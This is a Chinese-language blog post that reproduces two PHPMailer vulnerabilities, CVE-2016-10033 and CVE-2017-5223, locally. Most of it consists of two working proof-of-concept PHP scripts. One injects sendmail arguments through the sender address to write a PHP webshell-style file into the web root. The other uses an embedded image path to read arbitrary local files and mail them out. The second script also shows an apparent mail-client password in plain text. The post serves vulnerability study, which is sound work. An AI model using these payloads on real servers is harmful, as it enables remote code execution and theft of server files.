• PHPMailer命令执行及任意文件读取漏洞


      今天在thinkphp官网闲逛,无意下载了一套eduaskcms,查看了一下libs目录中居然存在PHPMailer-5.2.13,想起了之前看到的PHPMailer的漏洞,可惜这套CMS只提供了一个邮箱接口,前台页面需要单独自己写,没办法用这套CMS进行复现,这边也顺便利用这个PHPMailer-5.2.13对CVE-2016-10033和CVE-2017-5223进行本地复现,记录一下。

    PHPMailer 命令执行漏洞(CVE-2016-10033)

    漏洞编号:CVE-2016-10033

    影响版本:PHPMailer< 5.2.18

    漏洞级别: 高危

    漏洞POC:

    <?php /* 
    PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033) 
    A simple PoC (working on Sendmail MTA) 
    It will inject the following parameters to sendmail command: 
    Arg no. 0 == [/usr/sbin/sendmail] 
    Arg no. 1 == [-t] 
    Arg no. 2 == [-i] 
    Arg no. 3 == [-fattacker] 
    Arg no. 4 == [-oQ/tmp/] 
    Arg no. 5 == [-X/var/www/cache/phpcode.php] 
    Arg no. 6 == [some"@email.com] 
    which will write the transfer log (-X) into /var/www/cache/phpcode.php file. 
    The resulting file will contain the payload passed in the body of the msg: 
    09607 <<< --b1_cb4566aa51be9f090d9419163e492306 
    09607 <<< Content-Type: text/html; charset=us-ascii 
    09607 <<< 
    09607 <<< <?php phpinfo(); ?> 09607 <<< 
    09607 <<< 
    09607 <<< 
    09607 <<< --b1_cb4566aa51be9f090d9419163e492306-- 
    See the full advisory URL for details. 
    */ // Attacker's input coming from untrusted source such as $_GET , $_POST etc.  // For example from a Contact form  $email_from = '"attacker" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com'; 
    $msg_body  = "<?php phpinfo(); ?>"; // ------------------  // mail() param injection via the vulnerability in PHPMailer  require_once('class.phpmailer.php'); 
    $mail = new PHPMailer(); // defaults to using php "mail()"  $mail->SetFrom($email_from, 'Client Name'); 
    $address = "customer_feedback@company-X.com"; 
    $mail->AddAddress($address, "Some User"); 
    $mail->Subject    = "PHPMailer PoC Exploit CVE-2016-10033"; 
    $mail->MsgHTML($msg_body); if(!$mail->Send()) { echo "Mailer Error: " . $mail->ErrorInfo; 
    } else { echo "Message sent!
    "; 
    }

    PHPMailer任意文件读取漏洞分析(CVE-2017-5223)

    漏洞编号: CVE-2017-5223

    影响版本: PHPMailer <= 5.2.21

    漏洞级别: 高危

    漏洞POC:根据作者的POC改了几行,使其适用于qq邮箱

    <?php  
    #Author:Yxlink
    
    require_once('PHPMailerAutoload.php');
    $mail = new PHPMailer();
    $mail->isSMTP();
    $mail->Host = 'smtp.qq.com'; 
    $mail->Port = 465; 
    $mail->SMTPAuth = true; 
    $mail->Username = xxxx@qq.com';  //qq邮箱
    $mail->Password = 'zsuhxbmsaioxbcgb';//申请配置邮件客户端获取到的16位密码和qq密码不一样
    $mail->SMTPSecure = 'ssl';
    
    
    $mail->CharSet  = "UTF-8";
    $mail->Encoding = "base64";
     
    $mail->Subject = "hello";
    $mail->From = "xxxx@qq.com";  
    $mail->FromName = "test";  
     
    $address = "xxxx@qq.com";
    $mail->AddAddress($address, "test");
     
    $mail->AddAttachment('test.txt','test.txt'); 
    $mail->IsHTML(true);  
    $msg="<img src='D:\1.txt'>test";
    $mail->msgHTML($msg);
     
    if(!$mail->Send()) {
      echo "Mailer Error: " . $mail->ErrorInfo;
    } else {
      echo "Message sent!";
    }
    ?>
    

     

    最后

    欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 

     

    参考文章:

    PHPMailer任意文件读取漏洞分析(CVE-2017-5223)http://www.freebuf.com/vuls/124820.html

    PHPMailer 命令执行漏洞(CVE-2016-10033)分析 http://blog.csdn.net/wyvbboy/article/details/53969278

  • 相关阅读:
    使用 shell 脚本自动获取发版指标数据
    使用etcd选举sdk实践master/slave故障转移
    从零开始学Spark(一)
    Struts2被曝远程代码执行漏洞;叮咚买菜抢菜工具;find替代方案…|叨资讯
    从零开始学Spark(二)了解Spark
    7Zip 安全漏洞;FASTJSON 2.0 发布;程序员延寿指南…|叨资讯
    nodejs的TCP相关的一些笔记
    nodejs的tream(流)解析与模拟文件读写流源码实现
    nodejs的HTTP相关的一些笔记(代理服务、静态服务器工具)
    搭建Aira2实现个人离线下载
  • 原文地址:https://www.cnblogs.com/xiaozi/p/8439864.html
Copyright © 2020-2023  润新知